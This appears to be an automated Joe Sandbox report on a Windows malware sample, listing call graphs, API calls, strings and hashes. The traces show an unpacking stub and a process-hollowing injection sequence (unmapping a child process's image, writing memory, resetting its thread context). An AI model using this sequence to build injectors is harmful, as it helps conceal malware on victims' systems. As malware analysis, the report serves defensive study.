12480->12483 12486 4055fe __flsbuf 66 API calls 12481->12486 12485 409679 12482->12485 12487 4096d0 12483->12487 12488 40314e __configthreadlocale 11 API calls 12485->12488 12489 409704 12486->12489 12490 40177e __configthreadlocale 66 API calls 12487->12490 12488->12504 12491 4099a6 12489->12491 12496 403fdd __getptd 66 API calls 12489->12496 12492 4096d8 12490->12492 12494 4099b5 12491->12494 12495 409c56 WriteFile 12491->12495 12493 40314e __configthreadlocale 11 API calls 12492->12493 12493->12504 12497 409a70 12494->12497 12506 4099c8 12494->12506 12499 409988 12495->12499 12500 409c89 GetLastError 12495->12500 12498 40971f GetConsoleMode 12496->12498 12511 409a7d 12497->12511 12521 409b4a 12497->12521 12498->12491 12502 409748 12498->12502 12501 409cd4 12499->12501 12499->12504 12508 409ca7 12499->12508 12500->12499 12501->12504 12507 40177e __configthreadlocale 66 API calls 12501->12507 12502->12491 12503 409758 GetConsoleCP 12502->12503 12503->12499 12527 40977b 12503->12527 12504->12475 12505 409a12 WriteFile 12505->12500 12505->12506 12506->12499 12506->12501 12506->12505 12513 409cf7 12507->12513 12509 409cb2 12508->12509 12510 409cc6 12508->12510 12515 40177e __configthreadlocale 66 API calls 12509->12515 12550 4017a4 12510->12550 12511->12499 12511->12501 12512 409aec WriteFile 12511->12512 12512->12500 12512->12511 12518 401791 __close 66 API calls 12513->12518 12514 409bbb WideCharToMultiByte 12514->12500 12516 409bf2 WriteFile 12514->12516 12519 409cb7 12515->12519 12520 409c29 GetLastError 12516->12520 12516->12521 12518->12504 12523 401791 __close 66 API calls 12519->12523 12520->12521 12521->12499 12521->12501 12521->12514 12521->12516 12523->12504 12524 409827 WideCharToMultiByte 12524->12499 12526 409858 WriteFile 12524->12526 12525 40c3eb 78 API calls __fassign 12525->12527 12526->12500 12526->12527 12527->12499 12527->12500 12527->12524 12527->12525 12528 40c24d WriteConsoleW CreateFileW __write_nolock 12527->12528 12529 4098ac WriteFile 
12527->12529 12547 4064f8 12527->12547 12528->12527 12529->12500 12529->12527 12568 40c64a LeaveCriticalSection 12530->12568 12532 409df7 12532->12451 12536 404709 LeaveCriticalSection 12533->12536 12535 40c648 12535->12463 12536->12535 12555 40c542 12537->12555 12539 40b591 12540 40b599 12539->12540 12541 40b5aa SetFilePointer 12539->12541 12542 40177e __configthreadlocale 66 API calls 12540->12542 12543 40b5c2 GetLastError 12541->12543 12544 40b59e 12541->12544 12542->12544 12543->12544 12545 40b5cc 12543->12545 12544->12481 12546 4017a4 __dosmaperr 66 API calls 12545->12546 12546->12544 12548 4064c0 __isleadbyte_l 76 API calls 12547->12548 12549 406507 12548->12549 12549->12527 12551 401791 __close 66 API calls 12550->12551 12552 4017af _rand_s 12551->12552 12553 40177e __configthreadlocale 66 API calls 12552->12553 12554 4017c2 12553->12554 12554->12504 12556 40c54f 12555->12556 12558 40c567 12555->12558 12557 401791 __close 66 API calls 12556->12557 12559 40c554 12557->12559 12560 401791 __close 66 API calls 12558->12560 12561 40c5a6 12558->12561 12562 40177e __configthreadlocale 66 API calls 12559->12562 12563 40c578 12560->12563 12561->12539 12564 40c55c 12562->12564 12565 40177e __configthreadlocale 66 API calls 12563->12565 12564->12539 12566 40c580 12565->12566 12567 40314e __configthreadlocale 11 API calls 12566->12567 12567->12564 12568->12532 12570 402195 12569->12570 12571 4021a8 LeaveCriticalSection 12569->12571 12574 404709 LeaveCriticalSection 12570->12574 12571->12407 12573 4021a5 12573->12407 12574->12573 12576 5cb9b5 12575->12576 12577 5cb9a1 HeapAlloc LoadLibraryA 12575->12577 12576->12305 12576->12306 12577->12576 12579 5cba08 12578->12579 12585 5cb9db 12578->12585 12580 5cba0f GetServiceKeyNameA 12579->12580 12581 5cba39 12579->12581 12580->12581 12582 401114 setSBUpLow 5 API calls 12581->12582 12584 5cba47 12582->12584 12583 5cb9e7 EndUpdateResourceW WritePrivateProfileStringW 12583->12585 12584->12309 12585->12579 12585->12583 12587 403e8c 
12586->12587 12588 403e7d DecodePointer 12586->12588 12589 403e9d TlsFree 12587->12589 12590 403eab 12587->12590 12588->12587 12589->12590 12591 4046ce DeleteCriticalSection 12590->12591 12592 4046e6 12590->12592 12593 405342 _free 66 API calls 12591->12593 12594 4046f8 DeleteCriticalSection 12592->12594 12595 4041b9 12592->12595 12593->12590 12594->12592 12595->11304 12605 403df0 EncodePointer 12596->12605 12598 401ad1 __init_pointers __initp_misc_winsig 12606 4048b1 EncodePointer 12598->12606 12600 401af7 EncodePointer EncodePointer EncodePointer EncodePointer 12601 404668 12600->12601 12602 404673 12601->12602 12603 40467d InitializeCriticalSectionAndSpinCount 12602->12603 12604 4042aa 12602->12604 12603->12602 12603->12604 12604->11432 12604->11433 12605->12598 12606->12600 12610 401c34 12607->12610 12609 401d9b 12611 401c40 _raise 12610->12611 12612 4047fa __lock 61 API calls 12611->12612 12613 401c47 12612->12613 12615 401c72 DecodePointer 12613->12615 12619 401cf1 12613->12619 12616 401c89 DecodePointer 12615->12616 12615->12619 12629 401c9c 12616->12629 12618 401d6e _raise 12618->12609 12633 401d5f 12619->12633 12622 401d56 12623 401a9f __heap_alloc 3 API calls 12622->12623 12624 401d5f 12623->12624 12625 401d6c 12624->12625 12638 404709 LeaveCriticalSection 12624->12638 12625->12609 12626 401cb3 DecodePointer 12632 403df0 EncodePointer 12626->12632 12629->12619 12629->12626 12630 401cc2 DecodePointer DecodePointer 12629->12630 12631 403df0 EncodePointer 12629->12631 12630->12629 12631->12629 12632->12629 12634 401d65 12633->12634 12635 401d3f 12633->12635 12639 404709 LeaveCriticalSection 12634->12639 12635->12618 12637 404709 LeaveCriticalSection 12635->12637 12637->12622 12638->12625 12639->12635 12643 40383f 12640->12643 12641 408d30 _parse_cmdline 76 API calls 12641->12643 12642 4038ac 12644 4039aa 12642->12644 12645 408d30 76 API calls _parse_cmdline 12642->12645 12643->12641 12643->12642 12644->11456 12644->11458 12645->12642

Control-flow Graph

• Executed
• Not Executed

control_flow_graph 0 5cb070-5cb91c LoadLibraryW GetProcAddress VirtualProtect

APIs
• LoadLibraryW.KERNEL32(005DDB30,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 005CB8E8
• GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 005CB8F4
• VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 005CB914

Strings

Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: )?u$:/X$F(+$O8##$R'._$U99x$VirtualProtect$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02590156
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0259016C
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 02590255
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02590270
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02590283
                                                                                                                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0259029F
                                                                                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025902C8
                                                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 025902E3
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02590304
                                                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0259032A
                                                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02590399
                                                                                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025903BF
                                                                                                                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 025903E1
                                                                                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 025903ED
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 02590412
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377350104.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2590000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 33 5cbf60-5cbf8b call 40c410 36 5cbf90-5cbf9b 33->36 37 5cbf9d-5cbfa5 GetSystemTimes 36->37 38 5cbfaa-5cbfab 36->38 37->38 38->36 39 5cbfad-5cbfbb 38->39 40 5cbfc0-5cbfc5 39->40 41 5cbff7-5cbffd 40->41 42 5cbfc7-5cbff2 FlushFileBuffers GetVolumeInformationW 40->42 43 5cc00e-5cc013 41->43 44 5cbfff-5cc009 41->44 42->41 45 5cc029-5cc030 43->45 46 5cc015-5cc01f 43->46 44->43 45->40 47 5cc032 call 5cbb00 45->47 46->45 49 5cc037-5cc050 call 401114 47->49
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemTimes.KERNEL32(00000000,00000000,00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFA3
                                                                                                                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFC9
                                                                                                                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(Xediko poxucaze mavegogeje,?,00000000,?,?,?,?,00000000,?,00000000,?,004015D9,00400000,00000000,00000000,0000000A), ref: 005CBFF0
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Xediko poxucaze mavegogeje, xrefs: 005CBFEB
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: BuffersFileFlushInformationSystemTimesVolume
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Xediko poxucaze mavegogeje
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2067870256-956893252
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c29d636fe28b14d3de728b9c223744619c8f181c28315f7079e307b9bcecf7e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 87dcb88028291979576ac45ced47dbc9f44253d819400ab168a2741bc158dbd3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c29d636fe28b14d3de728b9c223744619c8f181c28315f7079e307b9bcecf7e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D72199726152009FE330DB94DC45FAAB7A8F7A8714F01052FE184D72D4D7B4A9499BA2
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 16 2590420-25904f8 18 25904fa 16->18 19 25904ff-259053c CreateWindowExA 16->19 20 25905aa-25905ad 18->20 21 259053e 19->21 22 2590540-2590558 PostMessageA 19->22 21->20 23 259055f-2590563 22->23 23->20 24 2590565-2590579 23->24 24->20 26 259057b-2590582 24->26 27 25905a8 26->27 28 2590584-2590588 26->28 27->23 28->27 29 259058a-2590591 28->29 29->27 30 2590593-2590597 call 2590110 29->30 32 259059c-25905a5 30->32 32->27
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02590533
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377350104.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2590000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 716092398-2341455598
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ded61104ceecf24b4fdf00cbe7125cddabe30f58d8c82e1a01c588d7f32b7e3e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86510870D08388DAEF11CBA8C849BDDBFB2AF11708F144058D5486F2C6C3BA5A58CB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 52 25905b0-25905d5 53 25905dc-25905e0 52->53 54 259061e-2590621 53->54 55 25905e2-25905f5 GetFileAttributesA 53->55 56 2590613-259061c 55->56 57 25905f7-25905fe 55->57 56->53 57->56 58 2590600-259060b call 2590420 57->58 60 2590610 58->60 60->56
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 025905EC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377350104.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2590000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID: apfHQ$o
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9691c49a11babdf1c1a7ac1102ae81560e4cca2e4096817e99ec8a3f95db1cfe
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F012170C0425CEEDF10DB98C5183AEBFB5AF41308F1484DDC4492B281D7769B59CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 61 5cb920-5cb956 LoadLibraryA
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(msimg32.dll,005CBE83), ref: 005CB950
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: msimg32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-3287713914
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 62 23cc7c6-23cc7df 63 23cc7e1-23cc7e3 62->63 64 23cc7ea-23cc7f6 CreateToolhelp32Snapshot 63->64 65 23cc7e5 63->65 66 23cc7f8-23cc7fe 64->66 67 23cc806-23cc813 Module32First 64->67 65->64 66->67 72 23cc800-23cc804 66->72 68 23cc81c-23cc824 67->68 69 23cc815-23cc816 call 23cc485 67->69 73 23cc81b 69->73 72->63 72->67 73->68
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023CC7EE
                                                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 023CC80E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 023CC000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_23cc000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 75 23cc485-23cc4bf call 23cc798 78 23cc50d 75->78 79 23cc4c1-23cc4f4 VirtualAlloc call 23cc512 75->79 78->78 81 23cc4f9-23cc50b 79->81 81->78
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023CC4D6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 023CC000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_23cc000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 85 5cb040-5cb053 LocalAlloc
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,?,005CBE21), ref: 005CB048
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 005CBB32
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 005CBB3A
                                                                                                                                                                                                                                                                                                                                                                  • GetConsoleAliasesW.KERNEL32(00000000,00000000,00000000), ref: 005CBB46
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 005CBB62
                                                                                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(00000000), ref: 005CBBA7
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 005CBBC0
                                                                                                                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000), ref: 005CBBC8
                                                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 005CBBE3
                                                                                                                                                                                                                                                                                                                                                                  • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 005CBBF6
                                                                                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBBFE
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 005CBC0D
                                                                                                                                                                                                                                                                                                                                                                  • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 005CBC19
                                                                                                                                                                                                                                                                                                                                                                  • GetStartupInfoW.KERNEL32(00000000), ref: 005CBC2A
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleExA.KERNEL32(00000000,tasazonobuwesixit,?), ref: 005CBC47
                                                                                                                                                                                                                                                                                                                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 005CBC93
                                                                                                                                                                                                                                                                                                                                                                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 005CBCA5
                                                                                                                                                                                                                                                                                                                                                                  • DnsHostnameToComputerNameA.KERNEL32(royariciguvecogowaditumihavozofilacuhadaxedayexecojafalanocitikogeduluwanifapu,?,?), ref: 005CBCBE
                                                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBCD4
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 005CBCE7
                                                                                                                                                                                                                                                                                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000000,00000000), ref: 005CBD40
                                                                                                                                                                                                                                                                                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000), ref: 005CBD48
                                                                                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(Ruz,Koyotu zoxivevicoyin dixiyutije,00000000), ref: 005CBD5A
                                                                                                                                                                                                                                                                                                                                                                  • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 005CBD66
                                                                                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,sekiziguleguhu,00000000,jejalasejipakeyijinikekicelilup,00000000), ref: 005CBD7E
                                                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 005CBD84
                                                                                                                                                                                                                                                                                                                                                                  • _wprintf.LIBCMT ref: 005CBDA2
                                                                                                                                                                                                                                                                                                                                                                  • _calloc.LIBCMT ref: 005CBDAE
                                                                                                                                                                                                                                                                                                                                                                  • _calloc.LIBCMT ref: 005CBDBA
                                                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 005CBDDC
                                                                                                                                                                                                                                                                                                                                                                  • _calloc.LIBCMT ref: 005CBDF4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CB920: LoadLibraryA.KERNELBASE(msimg32.dll,005CBE83), ref: 005CB950
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBA8B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 005CBAA8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBABE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: FileTimeToLocalFileTime.KERNEL32 ref: 005CBADE
                                                                                                                                                                                                                                                                                                                                                                  • SetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 005CBECB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
